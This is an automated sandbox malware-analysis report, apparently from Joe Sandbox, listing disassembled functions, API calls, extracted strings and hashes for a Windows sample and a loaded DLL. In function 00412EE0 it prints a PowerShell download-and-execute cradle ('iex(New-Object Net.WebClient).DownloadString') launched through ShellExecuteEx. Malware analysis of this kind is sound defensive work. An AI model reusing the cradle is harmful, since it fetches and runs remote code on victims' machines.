                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                                                                                                                                  • String ID: \oleacc.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 729a28a217b96509a232a936e05a4416240e1e8f8fee55bc0b86562b7ff41e59
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 384c15f8780953aedf03170b964e14deab5fa83b08a9843a1f072363323bf9e8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 729a28a217b96509a232a936e05a4416240e1e8f8fee55bc0b86562b7ff41e59
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F41CF707087109FE726DF29C984A9BB3F4EF94318F604A1CF59193650EB30E949CB9A
                                                                                                                                                                                                                                                                                                                                  Function 00412EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • ')", xrefs: 00412F03
                                                                                                                                                                                                                                                                                                                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54
                                                                                                                                                                                                                                                                                                                                  • <, xrefs: 00412F89
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3031569214-898575020
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dbfba8fe9a9d2bb0119a9c157c3566321eaf07b147eddf44f303722ded63ac89
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbfba8fe9a9d2bb0119a9c157c3566321eaf07b147eddf44f303722ded63ac89
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99
                                                                                                                                                                                                                                                                                                                                  Function 6C6374A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 6C637526
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C637566
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C637597
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                                                                                                                                  • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1ea36c8de006dba4e7eb0e9e06140bd852ba366235e53109642a40f924598a41
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f2b301edadec729e0d011248f791e67ef0853d4af03da62c7ee9699a809cd589
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ea36c8de006dba4e7eb0e9e06140bd852ba366235e53109642a40f924598a41
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F212831B00511EFCB18CFAA9E94E993375EF87375F642128D40957F80CB21B81189AF
                                                                                                                                                                                                                                                                                                                                  Function 6C63C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C63C0E9), ref: 6C63C418
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C63C437
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,6C63C0E9), ref: 6C63C44C
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                                                  • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 145871493-2623246514
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 70f9934701895da25a316816408451823ec6fff29e62c3f8361709e3774c90b1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b5787da28db8daff1a76c1870b7165bc33c1f46491ca1c9b881f45f0507faebc
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70f9934701895da25a316816408451823ec6fff29e62c3f8361709e3774c90b1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56E0BF70702311ABDF00FF73D9887157BF8B746344FB49115AA0592711DBB2D0158B5E
                                                                                                                                                                                                                                                                                                                                  Function 6C6375B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C63748B,?), ref: 6C6375B8
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C6375D7
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,6C63748B,?), ref: 6C6375EC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                                                  • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 145871493-3641475894
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 417ec3450ed385c2e0222ae667c21a7d06b50f2709a9b34af3afbc9efcb3060d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c84e2882012b6107b0a408c293292c8ce0eefae6b84fd48a965dde12b1dd6ea7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 417ec3450ed385c2e0222ae667c21a7d06b50f2709a9b34af3afbc9efcb3060d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAE09271700301AFEB00EFA3E9C87027AF8EB46358FB46025AA05D1690EBB090528F1E
                                                                                                                                                                                                                                                                                                                                  Function 6C637600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C637592), ref: 6C637608
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C637627
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,6C637592), ref: 6C63763C
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 145871493-1050664331
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bc880372e67fefc427d69df5a3e569c2c6b607ba5c63374015480659250bf6f1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 732c40ee2e6c1f7fda7bd7a03ccbd1042890e96ad5a08d570ed886e47afe4fc2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc880372e67fefc427d69df5a3e569c2c6b607ba5c63374015480659250bf6f1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59E07EB0700301AFDF00AFA7AD987017AB8E75A399FB45515EA09D2650EBB190118F1E
                                                                                                                                                                                                                                                                                                                                  Function 6C63BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,?,?,6C63BE49), ref: 6C63BEC4
                                                                                                                                                                                                                                                                                                                                  • RtlCaptureStackBackTrace.NTDLL ref: 6C63BEDE
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C63BE49), ref: 6C63BF38
                                                                                                                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL ref: 6C63BF83
                                                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(6C63BE49,00000000), ref: 6C63BFA6
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2764315370-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ad34ddab6004f5b806a5ceabec706b5f8343b64fc2c90cadb5f8071641e7e504
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 597000c965e36422c5b071eb85c8b3ed2a1dcf72da6ad7c412a8b4fa33502e5f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad34ddab6004f5b806a5ceabec706b5f8343b64fc2c90cadb5f8071641e7e504
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D519371A006258FE710CF69CD80BAAB3A2FFC5314F29A63DD51A97B54D730F9068B84
                                                                                                                                                                                                                                                                                                                                  Function 6C628E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C61B58D,?,?,?,?,?,?,?,6C64D734,?,?,?,6C64D734), ref: 6C628E6E
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C61B58D,?,?,?,?,?,?,?,6C64D734,?,?,?,6C64D734), ref: 6C628EBF
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C61B58D,?,?,?,?,?,?,?,6C64D734,?,?,?), ref: 6C628F24
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C61B58D,?,?,?,?,?,?,?,6C64D734,?,?,?,6C64D734), ref: 6C628F46
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C61B58D,?,?,?,?,?,?,?,6C64D734,?,?,?), ref: 6C628F7A
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C61B58D,?,?,?,?,?,?,?,6C64D734,?,?,?), ref: 6C628F8F
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fd69fd3a6c9a0448949fda8cc24dc571f3960b15fb4cbdf40e564f48b04f52c5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b4b6c552d96cfe9a8afea89018f97498c90438c2c82ac7fb278df842663abc02
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd69fd3a6c9a0448949fda8cc24dc571f3960b15fb4cbdf40e564f48b04f52c5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A651C3B2A012168FEB24CF54DC807AE77B2BF48358F25042AD516AB750E735F905CF96
                                                                                                                                                                                                                                                                                                                                  Function 6C5D4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C5D4E5A
                                                                                                                                                                                                                                                                                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C5D4E97
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5D4EE9
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5D4F02
                                                                                                                                                                                                                                                                                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C5D4F1E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 713647276-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9f1397695a00a6588509fa6837239552ae9d3cc932007e9596396b654866f172
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3b9be1349fa4cc35e70f166262f08991ce4e116c9b18e0429c1677d518af90aa
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f1397695a00a6588509fa6837239552ae9d3cc932007e9596396b654866f172
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A41AA71608702AFC705CF29C88095BBBE4FF89344F118A2DE5A697751DB30E958CB96
                                                                                                                                                                                                                                                                                                                                  Function 00410FC0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00410FE8
                                                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0041112D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0079D738,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 348468850-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 30b281ff186463a7567e755304345d337c186919a6888d37fa3608f7a8660f36
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30b281ff186463a7567e755304345d337c186919a6888d37fa3608f7a8660f36
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95
                                                                                                                                                                                                                                                                                                                                  Function 6C5E1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(-00000002,?,6C5E152B,?,?,?,?,6C5E1248,?), ref: 6C5E159C
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C5E152B,?,?,?,?,6C5E1248,?), ref: 6C5E15BC
